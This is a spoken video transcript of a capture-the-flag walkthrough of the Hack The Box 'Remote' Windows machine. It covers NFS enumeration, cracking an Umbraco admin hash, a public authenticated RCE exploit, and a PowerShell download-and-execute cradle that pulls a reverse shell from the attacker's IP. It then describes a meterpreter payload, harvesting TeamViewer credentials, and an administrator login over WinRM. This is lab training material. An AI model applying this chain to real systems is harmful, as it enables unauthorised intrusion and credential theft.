HackTheBox - "Remote" - Umbraco & Windows

Captions
Hello everyone, my name is John Hammond and welcome back to another YouTube video. Today we're looking at some Hack The Box, showcasing the Remote room that retires today. It is an easy... easy, I guess medium, no, easy. It's an easy Windows box; I'm just not that good because it's Windows. But I wanted to showcase this, walk through it with you. So here it is, Remote, and we have an IP address to work against: it's 10.10.10.180. We can fire up a command line and get to where the good stuff happens.

So I'm gonna head over to my Hack The Box folder and I'll make a directory for youtube remote and hop over there. So we could start with some good practice, actually create a little readme file, um, and I will just put in some classic notes: hello, this is me writing this on the day, which is September 45th, and here's the IP address of the machine.

Let's start off with the classic RustScan. I'll pipe this into a rustscan.log, so to tee that, and we can see what we're up against. Okay, some ports that are open: we see port 21 for FTP, port 80 for HTTP, one, I think that's rpcbind, uh, I always get that maybe wrong or something, 139, 135, 2049, okay, so maybe some network file share stuff. 5985, that's odd and peculiar, you don't see him all that often. Uh, port 5985, what is that? WinRM. WinRM, oh okay, I mean, it's Windows, that makes sense. Uh, maybe nmap, yeah, RustScan will pass it over to nmap and we'll kind of get a better idea as to what all those things are.

Um, but since we have some things to poke at, let me get started with some classic enumeration. I'll do a little nikto on that guy, tee that to get an output file. I'll do the same thing with some gobuster, HTTP, and I'll use a word list from the default word list that comes from DirBuster.

Alrighty, now let's go check out the web page. "Welcome to Acme. Allow me to introduce myself, my name is Wile E. Coyote, genius. I'm not selling anything nor am I working my way through college." And check out our products, okay, awesome. A couple of blog posts, looks like all lorem ipsum
text. If I click on any of those, do I get an idea of a username? This page loads... nope, no, no username, more lorem ipsum and nonsense. Products, is that a real link? Yeah, it is. Our gorgeous selection of unicorns, ping pong balls and a jumpsuit, okay, nice. Crazy people, great. Are these real links? Circuit beard, oh yeah, these are super cool, great.

Uh, let me just click on the source here, let me hit Ctrl+U and kind of see what it's built in. In the HTML I see some HTML comments for navigation, media links, add links to categories, a lot of that to-do HTML comment, read links to categories, scripts, Umbreco or Umbraco, I always pronounce that wrong, I don't know the best way to, uh, pronounce it, but that's an indicator that Umbraco might be on here. And if you google what that is, it is a CMS or content management system, if you haven't heard of it before. Uh, I think I've kind of seen it a little bit in other capture the flags or training exercises or activities.

Let's see what DirBuster... gobuster's got. Pretty much the same thing as previous and what we've already just seen through the web page. Nikto get anything yet? Nope. Nmap scan is done. Let me try and subl that rustscan log, and that's going to have all the gross colors, so if you wanted to, you could less tack r that and that way you can see the colors there, at least from your terminal. But, uh, scrolling through it just to get a better idea of these ports. Okay, we do have anonymous FTP, we could potentially log in with that. HTTP, yeah, rpcbind stuff, 2049 NFS, network file share, maybe there's something interesting in that, and that's all it's got for me.

Okay, well, if we have FTP, I guess we could take a look at that. 10.10.10.180 with my FTP client. We did see from our nmap scan was that anonymous share, anonymous access was enabled, so username will be anonymous and password could just be empty, you can whack enter there. Let's see what we have: nothing. Okay, and we can't go any farther than that or explore anything else, so that's not helpful. Fantastic. What else
did we have? We had port 80, which we're looking at, and we had the NFS share. I don't see anything else other than that intranet that they're going on, and we didn't actually poke at that intranet page. Is there anything over there? Still mentioning Umbraco in the CSS here. Umbreco, someone's going to give me flack, someone's going to, someone's going to hate on me for not knowing how to pronounce that. Does anyone know how to pronounce that? That's the same sort of thing, you're like, how do you pronounce radare2? Ridare, rad-air, I don't know, red-r. Jif, gif, starting the holy wars here.

If Umbraco is a thing, is that a location? Like, it's a content management system, like the same thing like WordPress might be, so maybe there's a page for that. In my cursory, uh, research on it, just for the showcase: content management system, publishing World Wide Web content, written in C#, deployed on Microsoft stuff. That tracks with me because we're looking at this on a Windows machine. Just doing some quick learning, reading to see... documentation can be found there, it's open source. Are there any like default locations that it adds? Oh, where's all this build, what is this guy? Quick tutorials, creating a basic site, oh goodness, can I just get to content? "When you hit your localhost address or whatever you're setting up, you should see welcome to the Umbraco installation screen," and then "log into your Umbraco... Umbraco CMS installation on /umbraco in your browser." Is that a thing? Gobuster hasn't found that yet, nikto hasn't found that. Maybe we could try some other stuff or like add it into our word list, but if I just simply try to go to umbraco or umbreco... oh, I have a login. "Happy funky Friday." Fantastic.

A username is usually your email, and password, so I can't just try like a classic admin admin, or like a stupid, stupid little SQL injection, will that get me anywhere? Dude, does that reflect out what I have in there? Can I do like some cross-site scripting? Hello, please sub, that's a better one, that's a better one
to throw in here, please sub, slap that in. Yeah, okay, whatever. Okay, we know though that there is a login here and we could do some other enumeration because there are still some other ports that we haven't looked at yet. Taking a look at this, we know we have 21 was a dead end, 80 was the web page obviously, and 2049 NFS or network file share.

So if you guys aren't familiar with, uh, mounting and looking at machines that have NFS shares, typically you can start with just a showmount command, and tack e will, uh, show them out... what does the tack e actually do? Oh, if you like kind of the colors that I'm using within, uh, batch, excuse me, within bash, uh, in my Linux command line, I'm using batman or bat, some of the shell extensions that come with the bat package. Tack e, and exports, will show the NFS server's export list. So the same way that I'm looking at, like cat, if I cat out my readme it has kind of nice color stuff, so if you're interested go ahead and take a look at that. Anyway, showmount tack e on our server here, 10.10.10.180, and they have a site backups that everyone could access. Ooh, could I try and mount that?

I'm gonna make a temporary directory that just matches the same thing, oh, with an incredible typo, dope. Make directory backups, and I already have one of those, so [Music] I'll recreate it for the sake of video, uh, and, and then let's go ahead and try and mount to it. So you can mount tack t nfs, so mount specifying the type network file share, and then what you actually want to mount. So you're going to specify the share with the IP address and a colon, and then you can just specify the share that you're actually looking for, so in this case it's site backups as we got that from showmount. And then you need the location as to where you're actually going to put it, so I'll put it in that temporary directory site backups that I created. And you do need root privileges to do that, so whack a little sudo on there and there we go. Okay, let's hop over there to site backups, and we got a lot of stuff.
Ooh, Umbraco, client... Braco. I'm just gonna like permutate all the potential possibilities of me saying that. And let's run like a find on here to see like everything that's in here, and I'll put it in my location where I'm working on this, I'll put in my notes, like, uh, nfslisting.txt, see what we get. Or anything... is find not gonna like buffer that or showcase that for me? Oh no, now there's stuff happening. What do we got in here?

So what we could do is we could kind of trim this down, open it in like Sublime Text or an editor and just kind of like remove the things that we know that we don't care about. That could kind of help us look for interesting things and prune for the potentially peculiar stuff that we might be able to find some valuable and juicy information with. Because a lot of the stuff, like, okay, Google Maps, pictures, we probably don't care about, um, same thing with like, I don't know, views. Oh, when there is some of the binary stuff for Umbraco... config files will probably be useful for us because maybe there's some more information as to how this thing is actually being put together. Yeah, CSS files though we don't need to care about, media files, images, and there's a ton of assets and fonts in Umbraco that we probably don't care about, blah blah blah, JavaScript files, Angular, yeah, okay, a lot more JavaScript, TinyMCE for some code editing, settings, views, settings, ASPX files. So this is, I guess, my process for like at least getting a quick snapshot of everything that's in there. Obviously find will return a ton of stuff, but you can kind of narrow this down and prune it down and look for interesting things if you wanted to. Oh whoops, I accidentally like pasted whatever I was searching.

There is a web.config, and that is usually something worthwhile to look at, so let me go ahead and cat out that web.config, and bat is giving us the nice, uh, color-coded output. And there is a lot of configuration stuff for Umbraco, and Umbraco, um, image processor config, Umbraco settings config, we could
save that, maybe took a, take a look at that one if we wanted to. What else do we have in here? App settings, connection strings, yeah, is this thing going to use it like a database? Umbraco DB, database, DSN... whoa, what just happened? Why did it bring me to the top of the file? Did I lose that? Did I just lose what I was looking at? There we go, Umbraco DB DSN. What is that? DSN, connection string with instance of Umbraco DSN, so that's definitely the database, yeah, yeah, okay. And that might be where it normally stores like a database and password. So since we're looking at Hack The Box, right, there's no other box that it's going to like reach out and connect here, this isn't going to be a full-blown network. It's going to... data source, data directory, umbraco.sdf. Is it a local file, or storing the database? What is this Umbraco SDF thing? You can see some of my previous research. Is it just like a local database? SDF file: "Spatial Data File is a single-user geodatabase file format developed by Autodesk." I don't know if that's, I don't know if that's the same thing I'm looking at. "Standard database format," that sounds a little bit more like what I'm looking at. Do I have that file? These are variables, data source, data directory. I think I guess I can just look for this umbraco.sdf, so let me find and grep for that guy, see what I have here. Please get a hit, please, please, please. Okay, app data, umbraco.sdf.

If I file that guy, what is it going to tell me? Data. Incredible, fantastic, that's super duper useful. Um, just strings it, dude, let's see if we get anything interesting in that. Oh yeah, okay, oh, this file is ginormous. Oh, and these are all like the blog posts and, ooh, the products, nice, crazy people, heck yeah. Let me, let me less this, see we got. Oh, right at the top: administrator, admin, default, en user, or US, some GUID, guide, GUID, administrator, admin, and that looks like a hash, yeah, and then it specifies hash algorithm SHA-1, whoa, okay. And that's repeated a little bit. So this looks like a potential hash, we could slap this
in our readme: NFS share, found, uh, app data umbraco.sdf. Can I crack that hash? It's a SHA-1 hash. Uh, CrackStation, yeah, yeah, like "crack hash online please," and that's totally the definition of CrackStation. Slap that in there, fail at a captcha... bacon and cheese, fantastic. For the admin user, right, and that had, that had his email in here, it's, uh, admin being his username and admin http.local looks like an email address. So can I log in with that? Bacon and cheese. Ooh, nice, yeah, yeah, okay, logged in.

What can I do with this? Media, settings, developer. Developer, does that let me do anything? Wait, is there any like, is there anything that like already does this? If I searchsploit for Umbraco, am I going to find anything? Remote code execution with Metasploit. Metasploit, is that a thing that will work? Oh wait, authenticated remote code execution is just as easily... what's that guy? Nikto didn't find anything else. So let's use Metasploit to search for that, see if it works. Upload ASPX, will that do it? What do I gotta know? It doesn't need like a username though, that's kind of weird to me. Well, let's just do it. I'm going to set my LHOST to my adapter and then I'll just set the RHOST to 10.10.10.180 and just fire the thing off. Execution failed. Okay, whatever.

What was that other one? There was a, there was a searchsploit other one that I saw. Um, goodness, goodness, large terminal size, make sure you guys can see this thing. Searchsploit tack m this guy, um, yeah, I'll just bring to the current directory. Yeah, yeah, yeah, for this thing, Umbraco remote code execution by authenticated administrators, that's me. Login, password, host, is just forgetting a, uh, closing quotation, that's funny. So we have admin hdb.local and we have bacon and cheese and our host is 10.10.10.180.
We'll just, just do it. What is it going to do? Launch the attack... what, what code does it run? Am I going to get like command execution? Execute a calc for the PoC. I don't really want that. Can I like ping myself? What's my IP address, just to see if this thing would work. ip addr, yeah, that's me. Slap in my address, and let's stop gobuster because you don't really need to do that. And then let's sudo... can I tcpdump like tack l, i tun0, and then look for ICMP? Yeah, I need to specify sudo for that, that's fine. So I just want to get like a proof of concept to see if this thing will actually execute that code. So let me python3 that four-thing guy. Oh, that needs to have the HTTP schema, it looks like, yeah. How about now? Did it do it, or did I do something wrong? Um, okay, that's fine, whatever. I guess we will put that away.

We'll searchsploit one last time to see what that last thing was. SEO checker plug-in, oh, it's just cross-site scripting, no, no. Let's do a simple Umbraco exploit search. Oh, noraj has one, authenticated remote code execution, that is the exact same thing that we just saw. This one looks good, Umbraco authenticated RCE. Oh, and you can just pass stuff right through it, so that'd be really easy, specify commands. What does this thing do? Some advisories on a Packet Storm, a little bit more robust, uh, script here, some argparse. This looks like a modified and better version of the thing that we were just looking at. So the payload is using some XML and XSL to invoke a process, oh yeah, it's just running C# through it, okay. Let's try that guy. It's a git repository, so I'm gonna go ahead and git clone this, and let's try to head over there and run this exploit. I need the username, so tack u admin http.local, password was bacon and cheese, uh, IP address 10.10.10.180, and then the c for the command to run, I'll just do like a simple whoami, your proof of concept. Oh, that also needs the HTTP prefix, you can tell kind of just by that Python error, like we're missing the schema. See if that gets
anything. It does, okay. So can I do that ping one more time, just kind of like verify. Uh, I'm 14.27, is that right? Oh, what is that doing? Why did that fail? Did that fail? Unrecognized arguments. Oh, the help says I need to specify tack a to note, to note some args. Okay, so let's fire that off, and there's the ping. Awesome, awesome, awesome. Okay, so now what? We have code execution, right. Uh, we should probably like take note of this simple thing in our, in our, in our notes here.

Let's see if we can get a reverse shell. This is a Windows box, right, I could probably run like systeminfo, yeah, and all this output is coming through, that's awesome. Windows box, x64 processor, it's good to know the architecture. So can I get a reverse shell? Um, on Windows you might need to do a little bit more clever things because it's not as easy as just running bash. If you want to do a PowerShell reverse shell, Nishang is pretty awesome to do that. "Nishang is a framework and collection of scripts and payloads which enables the use of PowerShell for offensive security, pen testing and red teaming." There is a PowerShell reverse shell that this thing has, and that is in the shells folder here, and there's an Invoke-PowerShellTcp.ps1. It is pretty decent PowerShell code with a lot of actual description and documentation as to what the heck the thing is doing. There's an example syntax here, so we could work with that. If you don't have that downloaded, you can git clone it, you can work with it. I am going to copy that from my opt directory, it's in shells, and then I have that Invoke-PowerShellTcp.ps1, I'll put that here, and then I'll modify that script. There's no like good, I don't think there's like a PowerShell display or color scheme in Sublime Text, which is annoying, but we have this example here. So what this is gonna essentially allow us to do... and wow, that's just really hard to look at. Can I cat that? Does bat know how to work with that thing? Yeah, okay, good. So at the end of all this, all this puts together is building out the
functionality to use that syntax. Like you would be able to run this and it would create all these functions that you could use, or bind these cmdlets for you. Uh, so what we want to do is at the very, very end actually execute this, so we could just stage this thing to fire off the reverse shell as we need to. I know my IP address was 10.10.14.27, and the port number quad 4 is totally fine to work with. So let's set up a little web server, python tack m http.server, let that go, and we have our Invoke-PowerShellTcp in the same directory as we're starting the web server. So I could start my netcat listener to get ready for this thing, and then I can try and fumble with the syntax of actually getting this thing to start.

So tack c will let me work with a command, so let's run powershell, and then we have tack a to pass in arguments. I'll make this a little bit easier to read. So I could simply be like echo, like hello, or please sub, just to get a proof of concept that I'm running PowerShell. Oh, and I need to be in that correct directory where that exploit script actually is. So okay, we get that output, good sanity check. Now I want to run IEX or Invoke-Expression, so I would be able to run commands from a string. So if I were to try and do that once again, echo please sub, following the IEX, this echo is going to come out into kind of standard output and then IEX will just execute please sub as if it were a command. In this case obviously there is no command please sub, so that tells me that that syntax might work. So now I'll go ahead and create a new object, and this is going to allow me to do some Windows stuff, PowerShell stuff, to get a web client object which has the function DownloadString, and that way I could give it my IP address, 10.10.14.27, on that port 8000, and download and run; because of this IEX, all that string is going to be pulled in and then executed. Invoke-PowerShellTcp.ps1. So ideally we'll see this web server see the request for that Invoke-PowerShellTcp, the victim and
target will run that code, and then over on the other side here I'll see my reverse shell come through. So if I whack the enter button, hopefully we'll get some magic, and we do. Now I am on that box, awesome, awesome, awesome. So I can do a little whoami and looks like I am this weird IIS user, that's fine. Let me go to the root of the directory, root of the file system here, and let's see if I could snag that user flag. Let me check Public, there it is. I can run cat because I'm in PowerShell, so there is that user flag, and I can't easily clear my screen so we'll just pretend you didn't see that, who cares.

Next we'll want to try to do some enumeration and potentially privesc, do our privilege escalation. So a really good way to do this is to run winPEAS or some of the Privilege Escalation Awesome Scripts. I'll just search for winPEAS, and Carlos Polop, I think I'm butchering pronunciation as always, so forgive me. Awesome Windows privilege escalation tools for Windows and Linux. So you've seen me run LinPEAS probably all the time on Linux stuff, but winPEAS is also really good to work with. They have a batch script rendition of it, uh, and I've seen that fumble for me, I don't know if it's because it's just slow to return or just didn't execute, but, uh, the exe file is kind of really what we would love to work with. Uh, if I actually go into this here, you know, there's a solution file for like actually getting the, the source code and stuff for working with it within Visual Studio and compiling the thing, but they do offer, under bin in this path here, they also offer releases and an x86, x64 or x86 release, so you literally have the executable file you could download and work with. I've tried to click on this and like download it raw and then I've had my browser yell at me, because Chrome would be like "hey, this is dangerous" or Firefox would be like "hey this, but this file is potentially malicious."

With that in mind, um, this reverse shell that we did, trying to run that Invoke-PowerShellTcp, might get
triggered by Windows Defender sometimes, I mean most often if that sort of thing is on, right, so you might not always be able to do this specific thing. In our Hack The Box learning environment we can totally do that. I'm just going to go ahead and download this with curl, I guess, so I will copy that link address, and I will close my silly meterpreter session because I don't need that anymore, and let's get back to my Hack The Box youtube remote file folder here. Let me go ahead and download this, so I'll wget winPEAS.exe, or you probably already have that repository cloned and you can just move it in here. Note that this is the 64-bit version, I pulled that one down specifically because we saw in our systeminfo command that's the same architecture for this victim. That's just kind of a good thing to do, I think the 32-bit one you can usually trust, but, uh, anyway, we've got that.

So now I actually want to download this file, so I'm going to go back into my reverse shell of the victim, and actually let me mark that as black so you kind of know there's some distinction here. Uh, I'll move into a temporary directory, I'll move into C Windows Temp, and there's some stuff in here now but I don't particularly care about it, it actually probably has some of my remnants of previously working on it, so let's kill those. Uh, yeah, yeah, yeah, removing the fourth wall. Let's, let's try and pull this down into this box. We still have our HTTP web server running so we could transfer files just as easily. Earlier we did this DownloadString, I think there's a DownloadFile one as well, but you also just have the kind of classic PowerShell Invoke-WebRequest. And my face is going to be in the way and I can't clear the screen, so let me make that go away. Invoke-WebRequest to download from my IP address, 10.10.14.27, port 8000, winPEAS.exe. I can pull this down but it kind of doesn't know what to do with it, so the best thing for us to do is actually bring that to a file, and you can pass that with that Invoke-WebRequest
tack OutFile argument. So http, 14.27, winPEAS, and I'll specify that tack OutFile location and I'll just call it like winPEAS.exe, keep the file name here. Good, that's downloaded. Now if I ls, I should have this file here, fantastic. So we could simply run this. If we were in cmd.exe, uh, you wouldn't need to specify the dot slash; since we are in PowerShell we should, to be able to run that out of the current directory. So I'll whack that winPEAS.exe, give that just a second, and hopefully, hopefully, hopefully it will come back with something. And it did, okay, fantastic. What do we got here? You could of course do this manual enumeration if you really wanted to. Oh, that also isn't giving me a full like scrollback. This, like, uh, could I download this? I'm trying to think of a decent way to be able to pull this back down to the victim.

You know what, I think a good thing to do would actually just be get a meterpreter shell in here, because that would just kind of make, kind of our, our control a little bit easier. So I like to just use some of the meterpreter cheat sheets or msfvenom to be able to craft that and create that. Netsec has a really, really good one that I always reference because it helps me not think and it just will give me the quick and easy payload. I know it's easy, a Windows meterpreter reverse TCP, but I always fumble with like the architecture and whether or not I need to specify that. So I will steal this command and I'll get back to my Sublime Text just so I can kind of, uh, have a window to tinker with this command. My IP address needs to be filled in here, 14.27, and we'll listen on, I guess, quad 6.
Here we go, and we'll call this like meterpreter.exe. Good, good, good, whack that out. That will go ahead and create a prepackaged binary and download... like actual program that we can run, put on the host, put on the victim, and then have it call back to our own meterpreter shell. So let me msfconsole this guy so I can prepare the handler, like the listener that'll be able to catch this reverse shell, and then we still have our HTTP server running down here. I'll use exploit multi handler and I will show options as a sanity check the things that I need to change. We do need to set our LHOST to ourselves, we do need to set our LPORT to our port that we wanted to listen on, and we should set the payload to the same thing that we told msfvenom to use, so I will set payload to that guy, and now I can run and start up that listener.

So back over in our victim, because we have just that simple meterpreter.exe file ready to download in the same directory, what I'll do is I'll once again use that Invoke-WebRequest to download this guy. Invoke-WebRequest, my IP, and save that to a file, I'll just call it met.exe. Good. Kind of zooming out here, I do have this met.exe, good, so my meterpreter shell should be all set and ready to catch that. So if I were to dot slash met, you can see that meterpreter session one opened up on the top here, fantastic. Now I can upload and download things a little bit easily and that might be convenient for actually checking out the rest of that, uh, winPEAS enumeration script. Let me go ahead and check out my current directory, I'm still in the temporary file, so I will actually use this shell to be able to run winPEAS.exe one more time and I'll save it to like winout.log, and hopefully when I get my prompt back that will behave for me. Good, now I can download that winout.log because that's in the current directory, and meterpreter is the one that has that download command. I wouldn't be able to kind of easily do that on the victim without being able to like spin up an HTTP
server or netcat or file transfer, so my meterpreter just kind of makes that nice and easy for me. So now let me go ahead and let's tack r that winout file. Yep, that's totally fine, yes. Do I actually have content in that? Oh boy, did it just do it? It did just do it. Does that not want to work? Can I cat winout.log? Okay, sure, that works just fine for me and bat will handle it. Now I can actually read through all the stuff that the winPEAS gave me. Uh, it would probably have just been smarter and better to have an actual scrollback on here, or use tmux or a better thing that will help me actually view the output of, but that was just some quick problem solving to be able to see the rest of this, and it's good to have the meterpreter on there.

Oh, Windows vault, search, powered by Watson, looks like this has a lot of stuff that could potentially be vulnerable for, user environment variables, computer name is remote, username is remote, system environment variable stuff we've seen before, LSA protection. No AV was detected, that's probably why we were able to totally run, uh, meterpreter and a reverse shell; normally you wouldn't see that happen on a Windows target. PowerShell stuff, drives information, current token privileges, maybe we could tinker with some of those, SeImpersonatePrivilege, ooh, would that be an option? Some auto login credentials were found, oh, just the default username for administrator, okay, nothing huge. Interesting processes, yep, there's PowerShell, I invoked that; met.exe, I invoked that, that's our meterpreter; winPEAS, I invoked that. Okay, all the interesting stuff seemingly is just me. Services information, interesting services, non-Microsoft, uh, OpenSSH, TeamViewer, oh whoa, and that's just running. Oh come on, I don't need less, I don't need your help. I was just looking at TeamViewer and it moved away from me. I can search for it again, TeamViewer, here we go. So if we did our actual like own manual enumeration, like if we went over to cd C and the C drive, you could probably hop over to like
the Program Files and see if there's anything that sticks out to you, any particular programs or software that might be installed. Don't forget to take a look in the other program files directory, Program Files (x86), slap that guy in there, and you should see TeamViewer. So that's kind of interesting and peculiar, not something that's installed by default, right, not native to Windows. So maybe a thought, considering this box is called Remote and TeamViewer is supposed to be a remote access and availability thing, uh, tool and program and software, I wonder if there are any logs or any information for that TeamViewer application. We could hop over there and start to explore things, if we really wanted to we could deep dive into it, but because we have the meterpreter on here, because we have Metasploit running, and I don't have a ton of shame, I don't have any issue with running Metasploit, uh, maybe there's a module that will be able to search and look for TeamViewer credentials. So, TeamViewer Metasploit: there is a Windows Gather TeamViewer Passwords, seemingly, module. "This module will find and decrypt stored TeamViewer passwords." Incredible.

So our meterpreter session, let's go ahead and hit back or background on that so we get back to our regular msf or msfconsole shell, and then let's search for that TeamViewer and see. Looks like we do have a post module, post windows gather credentials teamviewer passwords, let's check that out. So I'll use that and show options to see what we got to supply here. We do need the session for what we're actually working with, and if we were to check out our sessions, we have our one session of meterpreter here on the victim, so let me set session to just one and then fire that off. Immediately it finds this unattended password for remote, awesome. And I spent a decent amount of time now trying to figure out like, okay, how do I connect to TeamViewer, uh, with this unattended setup, can I just connect to it as an IP address and, and, and do things with it. I didn't really get
anywhere with that, uh, and then I eventually just kind of thought like, well, this is a password, right, and potential password reuse is a thing, so maybe this would be someone else's password. But I didn't see any other users on this box other than really just the administrator himself, and then I kind of put some of the puzzle pieces together: we saw in our RustScan output or from our nmap searching that we actually have WinRM on here, that port that we saw earlier, so maybe I could try this password for that administrator user. So I could save this if I wanted to, slap it in our readme, but let's go ahead and try to use Evil-WinRM to connect to it. If you aren't familiar with Evil-WinRM or you haven't seen it before, you can totally go download it, it's the WinRM shell that you could use for hacking and penetration testing. Typically it's just good to get access on a box if you see that Windows Remote Management or WinRM on a target on Windows. Pretty simple, needs tack i for an IP address, and a user and password you could pass along. It can also do some pass-the-hash stuff which is very, very cool, and I want to get smarter on this, I need to learn and tinker with it a little bit more, but let's go ahead and do it. Let's use Evil-WinRM on that IP address with the user being administrator and with the password being tack p, and I'm going to have to specify single quotes here because these exclamation points might make bash choke or whine. So let's whack that, and it connected.

So we are currently in the administrator's documents and we are the administrator, so we could check out what we have here. Over in his desktop, dir, looks like we have that root.txt. Uh, can I run wc tack l? Will PowerShell know what that means? No. Get, um, or like Measure-Object, I think. I can actually, cure, uh, clear this screen, so that's handy. Measure-Object root.txt, does that work? We could just cat the thing out but that is, uh, seriously, now I just kind of want to know. Measure-Object PowerShell. I am learning PowerShell. I guess I
would have to cat it out, yeah, so cat root.txt and then pipe it to Measure-Object, you can't just pass it the file name, incredible. Can I get the line, please? How about characters? Character, or char, character. 32 characters, so we know it's a hash, and I'm not spoiling anything by showcasing the root.txt when I've already showcased the user.txt anyway.

That's that, that is the Remote box. Uh, this was a lot of fun for me because it's Windows and I need to stretch myself and do more Windows boxes and Windows machines. Um, I have a lot to learn there and it's all about the learning process, so this has been kind of fun. I know it's an easy box and that's how it's kind of rated, but that's still something that I enjoy and have a good time with, and there's always some kind of cool tools and things to learn working with that. So holy cow, I hope you enjoyed this video. Uh, we did some really nifty stuff, doing some, I don't know, Umbraco, looking for things, enumerating in NTFS shares, or NFS shares, sorry, um, mounting those and exploring those and pillaging even with simple strings, and okay, then using some code execution, uh, to get access to the box, pulling in some winPEAS to do enumeration, and finding passwords with TeamViewer Metasploit. So there's a lot of, a lot of stuff going on, but wow, thanks so much for watching everybody. I really hope you enjoyed this video. If you did, please do do the YouTube algorithm things, I would love to see maybe a quick like in the video, a silly comment down at the bottom, I don't care, uh, YouTube algorithm stuff, please subscribe. Thanks so much for watching everybody, I'll see you in the next video. Take care, love you. [Music]
Info
Channel: John Hammond
Views: 77,446
Id: sskmyuVnSps
Length: 48min 22sec (2902 seconds)
Published: Sat Sep 05 2020